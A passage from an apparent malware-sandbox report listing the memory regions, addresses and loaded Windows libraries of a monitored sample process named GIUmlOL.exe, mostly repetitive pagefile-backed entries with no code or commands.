1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 13594 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 13595 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13597 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 13598 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13599 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13600 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13601 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 13602 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13603 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13604 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13605 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 13606 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 13607 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13608 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 13609 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 13610 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 13611 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13612 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 13613 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 13614 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13615 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13616 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 13617 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 13618 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 13619 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 13620 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 13621 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 13622 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13623 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 13624 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13625 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 13626 start_va = 0xa50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 13627 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 13628 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 13629 start_va = 0x1e50000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 13630 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 13631 start_va = 0x1e50000 end_va = 0x1f0ffff monitored = 0 entry_point = 0x1e70da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 13632 start_va = 0x1fa0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 13633 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 13634 start_va = 0x1e50000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 13635 start_va = 0x1fb0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 13636 start_va = 0x21b0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 13637 start_va = 0x25b0000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 13638 start_va = 0x2db0000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 14140 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 14214 start_va = 0x3d80000 end_va = 0x40b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14626 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 14627 start_va = 0x40c0000 end_va = 0x4353fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 14882 start_va = 0x40c0000 end_va = 0x4205fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 14883 start_va = 0x40c0000 end_va = 0x4286fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 15149 start_va = 0x40c0000 end_va = 0x564efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 15693 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15694 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 15695 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 15696 start_va = 0x40c0000 end_va = 0x4288fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 15700 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 15701 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 15702 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 15703 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 15704 start_va = 0x40c0000 end_va = 0x421cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 15908 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 15960 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 15961 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 15962 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15963 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15964 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15965 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16006 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16007 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16008 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16009 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16010 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16011 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16012 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16013 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16014 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16015 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16016 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16017 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16018 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16019 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16020 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16021 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16022 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16023 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16024 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16025 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16026 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16027 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16028 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16029 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16030 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16031 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16032 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16033 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16034 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16035 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16036 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16037 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16038 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16039 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16040 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16041 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16042 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16043 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16044 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16045 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16046 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16047 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16048 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16049 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16050 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16051 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16052 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16100 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16101 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16102 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16103 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16104 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16105 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16106 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16107 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16108 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16109 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16110 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16111 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16112 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16113 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16114 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16115 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16116 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16117 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16118 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16119 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16120 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16121 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16122 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16123 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16124 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16125 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16126 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16127 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16128 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16129 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16130 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16131 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16132 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16133 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16134 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16135 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16136 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16137 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16138 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16139 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16140 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16141 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16142 start_va = 0x1b0000 end_va = 